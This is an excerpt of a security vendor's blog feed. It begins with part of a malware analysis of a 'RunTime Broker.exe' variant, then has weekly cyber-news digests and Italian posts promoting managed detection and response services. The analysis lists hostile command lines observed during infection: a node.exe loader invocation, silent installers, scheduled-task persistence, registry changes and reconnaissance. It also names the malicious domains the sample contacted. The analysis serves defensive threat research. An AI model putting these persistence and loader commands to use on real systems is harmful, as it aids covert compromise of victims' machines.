        srcset=&quot;/website/static/f7c40b5053d01ed85e51033af2ba20c9/804b2/RuntimeBroker24.png 384w,
/website/static/f7c40b5053d01ed85e51033af2ba20c9/e5715/RuntimeBroker24.png 768w,
/website/static/f7c40b5053d01ed85e51033af2ba20c9/f1c64/RuntimeBroker24.png 1390w&quot;
        sizes=&quot;(max-width: 1390px) 100vw, 1390px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The file index.js was not found during the analysis.&lt;/p&gt;
&lt;h3&gt;4.2 Variant v.4 (september 4th 2023) &lt;a id=&quot;Variant-v.4&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Another variant of the &lt;em&gt;RunTime Broker.exe&lt;/em&gt; malware emerged in the previous days.&lt;/p&gt;
&lt;p&gt;As the previous version, also the last one we have observed is using a batch file present in a directory with a random name in the AppData\Local\Temp parent folder. The batch file is named &lt;em&gt;execute.bat&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Once the cmd.exe execute the batch file two processes are spawned:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;runtime brocker.exe&lt;/li&gt;
&lt;li&gt;chcp.com&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The last process would change the Code page in the active console to a UTF-8 encoding (chcp 65001).&lt;/p&gt;
&lt;p&gt;Then the process &lt;em&gt;RunTime Broker.exe&lt;/em&gt; spawns a JS file named &lt;em&gt;index.js&lt;/em&gt; (the file is located in the AppData\Local\Temp directory).&lt;/p&gt;
&lt;p&gt;The JS file is a sort of config file used by the Runtime Broker to executes the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;C:\program files (x86)\winsoft update service\pythonw.exe&lt;/strong&gt; &quot;C:\Program Files (x86)\WinSoft Update Service\bootstrap.pyc&quot;
&lt;ul&gt;
&lt;li&gt;Netconns to luke.compeyson.eu.org and cdn.goodfilehosting.it (both malicious)&lt;/li&gt;
&lt;li&gt;Child: &lt;strong&gt;C:\Program Files (x86)\WinSoft Update Service\pythonw.exe&lt;/strong&gt; -mpip install -U pytweening==1.0.7 pyscreeze==0.1.29 PyAutoGUI==0.9.54&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;psutil==5.8.0 playsound==1.2.2 WMI==1.5.1 mouse==0.7.1
keyboard==0.13.5 pyperclip==1.8.2 pycryptodome==3.15.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;appdata\local\temp\py_installer.exe&lt;/strong&gt; /VERYSILENT /SUPPRESSMSGBOXES/dir=expand:{pf}\pyt37&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;programdata\adobe\creative cloud experience node\node.exe&lt;/strong&gt; -e&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&quot;require(require(&apos;path&apos;).dirname(process.execPath) +
&apos;/node_modules/loader-module&apos;).inst()&quot;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;appdata\local\temp\screendim_inst.exe&lt;/strong&gt; /VERYSILENT /SUPPRESSMSGBOXES&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;appdata\local\temp\museum_installer.exe&lt;/strong&gt; /VERYSILENT&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;/SUPPRESSMSGBOXES /dir=&quot;expand:{pf}\WinSoft Update Service&quot;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;appdata\local\temp\adob_cinst.exe&lt;/strong&gt; /VERYSILENT /SUPPRESSMSGBOXES&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Runtime Broker.exe also spawns some Windows legit process, some used to get persistence on system, other to perform recognition:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;c:\windows\syswow64\schtasks.exe /RUN /TN ScreenBrightnessRestore [to ensure persistence on the system, ndr]&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;c:\windows\syswow64\schtasks.exe /create /F /XML &quot;C:\Program Files (x86)\ScreenDim\ScreenBrightnessRestore.xml&quot; /TN ScreenBrightnessRestore [to ensure persistence on the system, ndr]&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;c:\windows\syswow64\net session&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;c:\windows\syswow64\reg.exe delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Node_Run /f&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We also detected the execution of &quot;C:\Program Files (x86)\ScreenDim\ScreenDim.exe&quot; restore with parent process C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule . ScreenDim.exe then spawns &quot;C:\Program Files (x86)\pyt37\python.exe&quot; -m updater. This last process then makes several netconns to the following malicious domains:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;paul.microvortexus.it&lt;/li&gt;
&lt;li&gt;cdn.goodfilehosting.it&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;After the connections Screendim.exe is uninstalled.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - March 22nd]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-march-22/</link><guid isPermaLink="false">weekly-highlights-march-22</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 21 Mar 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;ENISA publishes a study on ‘Best Practices for Cyber Crisis Management’ that assists in preparation for crisis management. The study was conducted for the EU Cyber Crisis Liaison Organisation Network (CyCLONe) and is now available publicly&lt;/h2&gt;
&lt;h3&gt;#European Union&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.enisa.europa.eu/news/geopolitics-accelerates-need-for-stronger-cyber-crisis-management&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;EU Parliament approves Cyber Resilience Act&lt;/h2&gt;
&lt;h3&gt;#European Union&lt;/h3&gt;
&lt;p&gt;The European Union approved new cyber resilience standards to protect all digital products in the EU from cyber threats.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.europarl.europa.eu/news/en/press-room/20240308IPR18991/cyber-resilience-act-meps-adopt-plans-to-boost-security-of-digital-products&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Japanese technology giant Fujitsu confirmed that it fell victim to a cyberattack that likely resulted in the theft of personal and customer information&lt;/h2&gt;
&lt;h3&gt;#Breaches and Incidents&lt;/h3&gt;
&lt;p&gt;Fujitsu says hackers infected internal systems with malware, stole personal and customer information.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.securityweek.com/fujitsu-data-breach-impacts-personal-customer-information/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;North Korea-linked group levels multistage cyberattack on South Korea&lt;/h2&gt;
&lt;h3&gt;#Cyberwar&lt;/h3&gt;
&lt;p&gt;Kimsuky group has expanded its attack methodology to an eight-stage chain, leveraging legitimate cloud services and utilizing evasive malware for cyber espionage and financial crimes targeting South Korean entities&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.darkreading.com/vulnerabilities-threats/north-korea-linked-group-level-multistage-cyberattack-on-south-korea?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[MDR: protezione avanzata per la cybersecurity moderna]]></title><link>https://www.certego.net/blog/mdr-protezione-avanzata-per-la-cybersecurity-moderna/</link><guid isPermaLink="false">mdr-protezione-avanzata-per-la-cybersecurity-moderna</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 13 Mar 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Managed Detection and Response (MDR)&lt;/h2&gt;
&lt;p&gt;Il termine Managed Detection and Response (MDR) identifica un servizio completo di cybersecurity all&apos;avanguardia che unisce soluzioni tecnologiche avanzate con l&apos;expertise umana, per rilevare, identificare e neutralizzare le minacce informatiche in in tempo reale.&lt;/p&gt;
&lt;p&gt;Grazie a questo servizio, le aziende possono beneficiare del monitoraggio continuo degli asset IT e dell’analisi approfondita degli eventi per individuare comportamenti anomali e potenziali vulnerabilità, inclusi gli attacchi più sofisticati. La presenza di un Team dedicato di Incident Response, consente di intervenire efficacemente contro le minacce prima che queste possano causare danni.&lt;/p&gt;
&lt;p&gt;I provider di MDR agiscono come un&apos;estensione dei team di sicurezza interni, apportando competenze avanzate e supporto continuo per affinare le strategie di sicurezza. Questa sinergia eleva il livello di sicurezza informatica, potenziando la resilienza digitale dell&apos;organizzazione mediante un insieme di funzioni avanzate:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Monitoraggio degli asset aziendali:&lt;/h3&gt;
&lt;p&gt;la piattaforma MDR monitora gli endpoint, network, cloud, sistemi OT e vulnerabilità, assicurando una protezione completa;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Rilevamento e Risposta:&lt;/h3&gt;
&lt;p&gt;la piattaforma MDR raccoglie e analizza i dati dei sistemi IT aziendali e integrando algoritmi di rilevamento automatici con l&apos;expertise di analisti esperti, consente di rilevare e rispondere in tempo reale a tutte le tipologie di minacce;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Threat Intelligence:&lt;/h3&gt;
&lt;p&gt;combinando informazioni di Intelligence sulle minacce esterne con approfondimenti di prima mano sui dati dei clienti, la Cyber Threat Intelligence consente di arricchire le attività di analisi per comprendere e identificare in anticipo le tecniche di attacco più innovative, conferendo all’azienda un vantaggio competitivo nei confronti dei cybercriminali;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Orchestrazione e automazione (SOAR):&lt;/h3&gt;
&lt;p&gt;tramite l&apos;implementazione di playbook e procedure operative definite durante il deployment, la piattaforma MDR migliora l&apos;efficienza dei processi di cybersecurity, consentendo agli analisti focalizzarsi sulle minacce più critiche e accelerare i tempi di risposta;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Esperienza umana:&lt;/h3&gt;
&lt;p&gt;oltre alle attività di rilevamento e risposta, il team fornito dal provider MDR offre consulenza proattiva per migliorare i processi di cybersecurity, e supporto per l&apos;ottimizzazione della piattaforma, garantendo configurazioni personalizzate in base alle necessità specifiche dell&apos;azienda e livelli di difesa sempre aggiornati.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Questo approccio integrato non solo incrementa la capacità di difesa contro attacchi sofisticati, ma facilita anche una gestione della sicurezza informatica più strategica e focalizzata, migliorando significativamente la postura di sicurezza complessiva dell&apos;organizzazione.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Benefici dei servizi MDR&lt;/h2&gt;
&lt;p&gt;I servizi di Managed Detection &amp;#x26; Response rappresentano la risposta alle sfide dei reparti IT che ambiscono ad aumentare la maturità della sicurezza e ridurre i rischi informatici, consentendo alle aziende di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Migliorare le attività di rilevamento:&lt;/h3&gt;
&lt;p&gt;l’unione di tecnologia avanza e analisi esperta consente di analizzare in maniera più rapida e approfondita le attività sospette;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Velocizzare le attività di risposta:&lt;/h3&gt;
&lt;p&gt;la capacità di agire in tempo reale riduce drasticamente i tempi necessari per mitigare gli incidenti.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Adottare un approccio proattivo:&lt;/h3&gt;
&lt;p&gt;poter contare su informazioni di Threat intelligence di alta qualità consente di anticipare le mosse delle cyber gang;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Alleggerire il carico di lavoro dei team IT interni:&lt;/h3&gt;
&lt;p&gt;affidando le operazioni di sicurezza al provider MDR, i team interni possono concentrati esclusivamente sulle attività più critiche per la sicurezza;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Minimizzare i falsi positivi:&lt;/h3&gt;
&lt;p&gt;l’analisi approfondita dei dati di telemetria riduce il numero dei falsi positivi a carico del cliente, ottimizzando le risorse e l&apos;efficienza;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Accesso a Competenze e Tecnologie Avanzate:&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;assicura una postura di sicurezza sempre aggiornata e preparata per gli attacchi di nuova generazione.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Certego MDR&lt;/h2&gt;
&lt;p&gt;I servizi di Managed Detection &amp;#x26; Response erogati da Certego si articolano intorno a tre pilastri, perfettamente integrati tra loro in modo sinergico: la piattaforma proprietaria PanOptikon®, un team dedicato di Security Operations Services e un&apos;intensa attività di ricerca nell&apos;ambito della Cyber Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La stretta interconnessione tra tecnologia avanzata, competenze umane altamente specializzate e analisi approfondita delle minacce, posiziona Certego come player all’avanguardia nei servizi di Managed Detection &amp;#x26; Response.&lt;/p&gt;
&lt;h3&gt;Piattaforma PanOptikon®:&lt;/h3&gt;
&lt;p&gt;La piattaforma PanOptikon®, sviluppata da Certego, rappresenta il cuore tecnologico del servizio MDR. Concepita come soluzione SaaS, abilita le attività di monitoraggio, analisi e risposta alle minacce informatiche, offrendo una visibilità unificata dei diversi ambienti IT attraverso un&apos;unica soluzione integrata.&lt;/p&gt;
&lt;p&gt;La piattaforma si distingue per la sua scalabilità e flessibilità, caratteristiche che permettono di adattarla alle specifiche esigenze di ogni cliente attraverso moduli attivabili su misura. La struttura modulare di PanOptikon® assicura che la piattaforma possa evolvere parallelamente alle crescenti necessità dell&apos;azienda, garantendo un supporto continuo e affidabile nel tempo.&lt;/p&gt;
&lt;p&gt;PanOptikon® offre ampie possibilità di personalizzazione, consentendo il tuning ad-hoc delle regole di rilevamento, analisi e risposta. Questa capacità di customizzazione assicura che le strategie di sicurezza possano essere finemente calibrate in base al contesto operativo specifico, migliorando l&apos;efficacia della protezione informatica e rispondendo dinamicamente alle mutevoli minacce del panorama cyber.&lt;/p&gt;
&lt;h3&gt;Security Operations Services:&lt;/h3&gt;
&lt;p&gt;I servizi di Security Operations consentono di affidare le operazioni di sicurezza informatica a un team di esperti altamente qualificati. 
Questi professionisti, tra cui Cyber Security Analyst, Threat Hunter, Threat Researcher, Incident Responder, Forensics Analyst e Service Specialist, possiedono le certificazioni e l&apos;esperienza necessarie per contrapporsi efficacemente alle minacce più sofisticate, assicurando una protezione adattiva 24 ore su 24, 7 giorni su 7.&lt;/p&gt;
&lt;p&gt;L&apos;offerta del Security Operations team include anche un supporto completo e proattivo per la gestione e la personalizzazione della piattaforma di sicurezza, ottimizzando la configurazione in funzione delle esigenze specifiche di ogni cliente.&lt;/p&gt;
&lt;h3&gt;Threat Intelligence:&lt;/h3&gt;
&lt;p&gt;La Threat Intelligence svolge un ruolo cruciale nei servizi di Managed Detection and Response di Certego, agendo come fulcro per una difesa informatica proattiva ed efficace. 
La capacità di Certego di arricchire i propri servizi MDR con una Intelligence proprietaria, specificamente orientata al contesto italiano, ma estesa con dati globali e contributi di terze parti, rappresenta un vantaggio competitivo distintivo, potenziando significativamente l&apos;efficacia della lotta contro le minacce informatiche.&lt;/p&gt;
&lt;p&gt;Il team di Threat Intelligence di Certego impiega una metodologia approfondita per la raccolta dati, esplorando le zone più remote del Dark Web, forum esclusivi, reti segrete e gruppi privati sui social media. L&apos;obiettivo è catturare le minacce alla loro origine, intercettando informazioni cruciali per la sicurezza. Queste informazioni, una volta elaborate, diventano intelligence operativa, dotando sia gli analisti di Certego che i clienti di informazioni precise, rilevanti e pronte per anticipare le mosse dei cybercriminali.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/services/managed-detection-and-response/&quot;&gt;Scopri di più sui servizi MDR di Certego&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - March 8th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-march-8/</link><guid isPermaLink="false">weekly-highlights-march-8</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 07 Mar 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;EU Agrees &apos;Cyber Solidarity Act&apos; to Bolster Incident Response and Recovery&lt;/h2&gt;
&lt;h3&gt;#European Union&lt;/h3&gt;
&lt;p&gt;The European Union (EU) has agreed new rules to strengthen cyber incident response and recovery across member states, which has been dubbed the ‘cyber solidarity act.’&lt;/p&gt;
&lt;p&gt;The provisional regulation aims to make the EU more resilient and reactive to cyber threats via new cooperation mechanisms.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.infosecurity-magazine.com/news/eu-cyber-solidarity-incident/?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Capita says cyberattack contributed to annual loss of more than £106 million&lt;/h2&gt;
&lt;h3&gt;#Breaches and Incidents&lt;/h3&gt;
&lt;p&gt;Capita, the British outsourcing company hit by a ransomware attack last March, has reported losing $135.5 million over the last year — roughly a quarter of which was directly caused by the incident.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://therecord.media/capita-cyberattack-loss-of-hundred-million&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;A new Linux malware campaign is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The threat actors behind this campaign employed previously undetected payloads, including four Golang binaries that are used to automate the discovery and infection of hosts running the above services.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://securityaffairs.com/160093/hacking/linux-malware-cryptocurrency-campaign.html?web_view=true&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Lazarus hackers exploited Windows zero-day to gain Kernel privileges&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;North Korean threat actors known as the Lazarus Group exploited a flaw in the Windows AppLocker driver a zero-day to gain kernel-level access and turn off security tools, allowing them to bypass noisy BYOVD techniques.&lt;/p&gt;
&lt;p&gt;CVE, now tracked as CVE-2024-21338, was reported to Microsoft, which led to the development of a fix for the flaw included in the February 2024 Patch Tuesday update.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/lazarus-hackers-exploited-windows-zero-day-to-gain-kernel-privileges/?&amp;#x26;web_view=true#google_vignette&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;From February 24th to March 1st, CERT-AGID has identified and analyzed 16 malicious campaigns within its reference Italian scenario&lt;/h2&gt;
&lt;h3&gt;#Reports&lt;/h3&gt;
&lt;p&gt;14 campaigns had specifics Italian targets.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://cert-agid.gov.it/news/sintesi-riepilogativa-delle-campagne-malevole-nella-settimana-del-24-febbraio-1-marzo-2024/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Migliorare la sicurezza e massimizzare il ROI]]></title><description><![CDATA[Il ruolo cruciale dei servizi MDR nelle strategie di cybersecurity]]></description><link>https://www.certego.net/blog/migliorare-la-sicurezza-e-massimizzare-il-roi-con-i-servizi-mdr/</link><guid isPermaLink="false">migliorare-la-sicurezza-e-massimizzare-il-roi-con-i-servizi-mdr</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 29 Feb 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;La recente sofisticazione degli attacchi informatici ha portato ogni organizzazione a fronteggiare sfide senza precedenti per proteggere i propri ambienti IT. I team di sicurezza interni, spesso vincolati da limitazioni di risorse, lottano per gestire un flusso costante di allarmi. Questa sovrabbondanza di segnalazioni mette a dura prova la capacità dei reparti IT aziendali di rilevare e investigare ogni minaccia, evidenziando la necessità di adottare soluzioni e servizi di cybersecurity avanzati, in grado di garantire l’analisi di tutti gli eventi sospetti e offrire una risposta tempestiva ad ogni tentativo di intrusione.&lt;/p&gt;
&lt;p&gt;In risposta a questa esigenza, i servizi di Managed Detection and Response (MDR) emergono come soluzione ottimale, mettendo a disposizione delle aziende un team di Detection and Response altamente efficiente, operativo 24 ore su 24, 7 giorni su 7, a un costo decisamente inferiore rispetto alla creazione di un team di cybersecurity in-house.
&lt;strong&gt;I servizi di MDR assicurano una visibilità completa degli ambienti IT, migliorando notevolmente l&apos;accuratezza dei rilevamenti, la profondità delle analisi e l&apos;efficacia delle azioni di risposta&lt;/strong&gt;. Fondamentali per estendere le capacità di sicurezza interne, i servizi di MDR arricchiscono inoltre l&apos;organizzazione con informazioni di primo livello di Threat Intelligence, tecnologie avanzate e consigli proattivi per il rafforzamento continuo delle linee di difesa.&lt;/p&gt;
&lt;p&gt;Affidarsi ai servizi di MDR significa, quindi, non solo rispondere in maniera efficace e tempestiva alle minacce, ma anche &lt;strong&gt;abbracciare una strategia di sicurezza che si adatta dinamicamente&lt;/strong&gt; all&apos;evoluzione del panorama della cybersecurity. Questo consente alle organizzazioni di superare le limitazioni operative interne, &lt;strong&gt;ottimizzando l&apos;allocazione del budget di sicurezza in modo intelligente e mirato&lt;/strong&gt;.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Ottimizzazione del ROI&lt;/h2&gt;
&lt;p&gt;L&apos;integrazione dei servizi di Managed Detection and Response (MDR) nelle strategie di cybersecurity aziendali, non solo potenzia i livelli di sicurezza, ma si rivela anche una &lt;strong&gt;mossa strategica per massimizzare il ritorno sugli investimenti (ROI)&lt;/strong&gt;, consentendo di gestire la sicurezza informatica in modo più efficace e allineato alle esigenze di budget, offrendo un approccio ottimizzato che coniuga protezione avanzata e gestione oculata delle risorse. Vediamo alcuni esempi:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(I nomi delle aziende e gli esempi citati sono fittizi, ma ispirati a scenari reali nel campo della cybersecurity per illustrare situazioni concrete)&lt;/em&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Risparmio sui costi di gestione interna&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Creare internamente all’azienda una struttura comparabile a quella offerta da un provider MDR richiede un investimento significativo&lt;/strong&gt; in competenze specialistiche, tecnologie e infrastrutture, oltre al mantenimento di un&apos;operatività continua, 24 ore su 24, 7 giorni su 7, il cui costo è molto elevato.
Affidarsi a servizi di MDR, che integrano rilevamento, analisi, risposta e consigli proattivi per l&apos;aggiornamento continuo dei sistemi di difesa e l&apos;accesso a informazioni strategiche di Threat Intelligence, consente alle aziende di tenere il passo con le sfide della cybersecurity senza sostenere costi elevati.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Esempio:&lt;/h3&gt;
&lt;p&gt;A fronte di un considerevole aumento degli eventi sospetti di cybersecurity a carico del personale IT, l&apos;azienda TekNova, operante nel settore manifatturiero, si trova di fronte alla decisione di sviluppare internamente un team di sicurezza informatica operativo 24/7 o di affidarsi a un partner che eroga servizi di MDR.&lt;/p&gt;
&lt;p&gt;Oltre ai costi del personale interno, una delle sfide più significative nell&apos;organizzare un team dedicato alla sicurezza è la difficoltà di assicurare la copertura continua, compresi i turni notturni e festivi. Trovare professionisti qualificati disposti a lavorare in questi orari richiede non solo un processo di selezione più complesso e prolungato ma anche incentivi economici significativi per compensare la reperibilità e il lavoro in orari non standard. Inoltre, l&apos;impegno economico richiesto per la formazione continua e per il mantenimento delle competenze del personale di sicurezza al passo con le evoluzioni delle minacce informatiche rappresenta un altro onere finanziario considerevole. Questi fattori, sommati all’esigenza di investire in soluzioni tecnologiche avanzate e nella loro manutenzione, si traducono in costi iniziali e operativi elevati.
Affidandosi a un servizio di MDR, TekNova può superare queste sfide, assicurandosi un team di esperti sempre disponibile e aggiornato sulle ultime minacce, senza dover gestire direttamente i costi e le complessità legate alla formazione, alla ricerca e alla gestione del personale. Questo approccio consente a TekNova di ottimizzare l&apos;utilizzo delle risorse finanziarie e umane. Allo stesso tempo, l&apos;azienda ottiene livelli di sicurezza maggiori, migliorando l&apos;efficienza operativa e affinando gli investimenti in cybersecurity.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h3&gt;Efficienza e ottimizzazione delle risorse IT&lt;/h3&gt;
&lt;p&gt;Adottare un servizio di MDR si traduce in un considerevole vantaggio competitivo per le imprese, consentendo un riorientamento delle risorse IT verso iniziative chiave che promuovono crescita e innovazione. Questo slancio strategico consente al team IT di distaccarsi dalle attività quotidiane legate alla cybersecurity, come la gestione e il triage di un volume molto ampio di segnalazioni di sicurezza, che spesso possono rilevarsi falsi positivi. Liberando il personale IT dal fardello di esaminare ogni singolo alert, si apre la possibilità di &lt;strong&gt;impiegare le competenze in modo più efficace&lt;/strong&gt;: investendo nello sviluppo e nell&apos;ottimizzazione di processi tecnologici all&apos;avanguardia che aumentano il valore aziendale e rafforzano la posizione competitiva sul mercato.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Esempio:&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;FinCorp, un&apos;istituzione nel settore finanziario, è di fronte alla complessa sfida di bilanciare le proprie necessità di cybersecurity con gli obiettivi di innovazione nel mercato dei servizi finanziari digitali. La gestione interna delle attività di monitoraggio e risposta agli incidenti di sicurezza richiede tempo e risorse, che potrebbero essere invece allocate in progetti di sviluppo ad alto potenziale di generazione di ricavi. Per affrontare questa sfida, FinCorp opta per l&apos;adozione di un servizio di MDR. Questa decisione strategica permette al team IT di concentrarsi su iniziative che favoriscono la crescita e l&apos;innovazione, come lo sviluppo di nuove piattaforme di banking digitale.

La decisione di affidarsi a un servizio di MDR non solo incrementa la sicurezza informatica di FinCorp, ma anche i suoi ricavi, facilitando la più rapida introduzione di innovazioni nei servizi finanziari. Tra queste, l&apos;ampliamento della propria offerta di banking digitale e il lancio di nuovi servizi digitali focalizzati sul cliente contribuiscono significativamente a migliorare il posizionamento competitivo, i ricavi e la capacità di innovazione dell&apos;istituzione.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Riduzione del rischio e mitigazione dei costi associati&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;L&apos;adozione dei servizi di MDR minimizza il rischio di violazioni dei dati e attacchi informatici&lt;/strong&gt; attraverso rilevazioni e risposte tempestive, evitando così costi potenzialmente molto gravosi legati a perdite finanziarie, sanzioni normative e danni alla reputazione. La capacità di mantenere la continuità operativa e ridurre i tempi di inattività rappresenta un vantaggio finanziario diretto, contribuendo a un ROI tangibile.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Esempio:&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;  Consapevole dell&apos;impatto economico delle violazioni dei dati, la società &quot;HealthData&quot;, specializzata nell’erogazioni di servizi sanitari nel settore privato e gestione dei dati dei pazienti, si trova di fronte a un rischio notevole. Un&apos;analisi approfondita dei costi e dei benefici dimostra che l&apos;adozione di un servizio di MDR può notevolmente abbassare la possibilità di incidenti di sicurezza, riducendo così il rischio di impatti finanziari significativi causati da eventuali violazioni dei dati.

Questa strategia non solo tutela i dati sensibili dei pazienti, ma previene anche costi indiretti, quali danni alla reputazione aziendale e perdita di clientela. Inoltre, implementando un approccio proattivo alla sicurezza, HealthData assicura la propria continuità operativa, aspetto cruciale in ogni settore aziendale.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/li&gt;
&lt;/ul&gt;
